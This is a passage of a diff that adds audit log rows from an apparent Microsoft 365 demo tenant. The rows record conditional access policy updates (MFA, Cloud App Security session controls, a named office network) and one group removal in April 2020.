+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/27/2020 3:17:16 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-27T03:17:16Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/27/2020 3:17:16 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-27T03:17:17Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/27/2020 3:17:17 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-27T03:17:17Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/27/2020 3:17:17 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-27T03:17:16Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/27/2020 3:17:16 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-27T03:17:17Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/27/2020 3:17:17 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-27T03:17:16Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/27/2020 3:17:16 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-27T03:17:17Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/27/2020 3:17:17 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-27T03:17:16Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/27/2020 3:17:16 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-25T14:18:48Z,,,Remove-UnifiedGroup,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""0465d31c-30d2-478e-bd7b-90ad96eede5b""
+  }
+]"
+2020-04-26T02:42:05Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 2:42:05 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T02:42:05Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 2:42:05 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T02:42:05Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 2:42:05 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T02:42:05Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 2:42:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T02:42:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 2:42:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T02:42:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 2:42:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T02:42:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 2:42:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T02:42:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 2:42:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T02:42:05Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 2:42:05 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T02:42:05Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 2:42:05 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-26T02:42:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 2:42:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T02:42:05Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 2:42:05 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T02:42:04Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 2:42:04 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T06:09:31Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 6:09:31 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-04-26T06:09:30Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""4/26/2020 6:09:30 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-26T06:09:29Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
